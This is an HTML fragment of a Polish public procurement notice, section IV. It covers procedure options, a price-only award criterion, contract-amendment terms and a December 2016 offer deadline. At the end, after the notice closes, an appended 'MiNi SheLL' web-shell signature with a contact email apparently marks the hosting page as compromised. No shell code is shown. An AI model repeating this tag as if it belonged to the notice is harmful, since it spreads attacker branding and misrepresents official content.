                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br /> 1.   Istotne dla stron postanowienia umowy.

 1.1 Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na
         podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z 
         następujących okoliczności:
     a) zmiany zostały przewidziane w ogłoszeniu o zamówieniu lub SIWZ w postaci 
         jednoznacznych postanowień umownych,które określają ich zakres, w szczególności 
         możliwość zmiany wysokości wynagrodzenia Wykonawcy, i charakter oraz warunki 
         wprowadzenia zmian. 
         Uwaga:
         Maksymalne ilości artykułów (asortymentów) przedmiotu zamówienia,  
         Zamawiający określił (działając z należytą starannością) w formularzach cenowych 
         (Zał. Nr.3  6 do SIWZ). Zamawiający  zastrzega sobie prawo do dostosowania tych
         ilości do swoich potrzeb (z uwzględnieniem konsekwencji rachunkowych w 
         wynagrodzeniu umownym   do max. jego wartości wynikającej  z  umowy).
     b) zostały spełnione łącznie następujące warunki:
      -  konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający,
         działając z należytą starannością, nie mógł przewidzieć,
      -  wartość zmiany nie przekracza 50 % wartości zamówienia określonej pierwotnie
         w umowie.
     c) Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy
         Wykonawca:
     -   na  podstawie postanowień umownych, o których mowa w pkt. 1.1 ppkt. a,
     -   w wyniku połączenia, podziału, przekształcenia, upadłości,restrukturyzacji lub nabycia
         dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca  
         spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy  
         wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,
     d) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego
         podwykonawców,

2.  W wyniku niniejszego postępowania zostanie zawarta umowa, której treść zawarto we
           wzorze umowy stanowiącym  Załącznik Nr 10 do SIWZ.

3.  Zamawiający przewiduje zmianę postanowień zawartej umowy z przyczyn  o których
         mowa w pkt. 1.1 ppkt. a-d  , oraz zmiany z przyczyn o których mowa    
         w pkt. 3  ,  które będą mogły  być wprowadzone w formie aneksu do 
         umowy. Przyczyny zmian, określone w pkt. 3  , dotyczą :
    a) Wszystkie wartości netto i ceny netto za jednostkę określone przez Wykonawcę, są
         ustalone na okres ważności umowy i nie wzrosną.  Dopuszcza się zmianę
         umowy w formie aneksu w przypadku, gdy wartości netto i ceny netto za jednostkę
         określone przez Wykonawcę obniżą się, przy czym konsekwencje rachunkowe
         stosuje się odpowiednio.
     b) Urzędowa zmiana stawek podatku VAT obowiązuje z mocy prawa. 
         Dopuszcza się zmianę zapisów umowy w formie aneksu w przypadku zmiany stawki
         podatku VAT, oraz zmiany przepisów prawa podatkowego.
     c) W przypadku zaprzestania produkcji danego artykułu (asortymentu) , lub zmiany jego
         gramatury, Zamawiający dopuszcza dostawy artykułu  (asortymentu)  zastępczego,  
         spełniającego wymogi SIWZ. Cena asortymentu (towaru) zastępczego  nie może być 
         wyższa niż cena oferowana w umowie.
    d) Zamawiający dopuszcza zmiany producenta dostarczanego artykułu ( asortymentu) ,
          pod warunkiem, że artykuł (asortyment) będzie takiej  samej lub lepszej jakości, oraz    
          w   tej samej cenie, a Wykonawca uzasadni konieczność dokonania takiej zmiany.
     e) Zmiany polegające na zmianie nr telefonu, nr faxu, adresu e-mail, niezbędne dla
          realizacji zamówienia oraz na które składane są przez Zamawiającego, zamówienia
          i reklamacje,<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com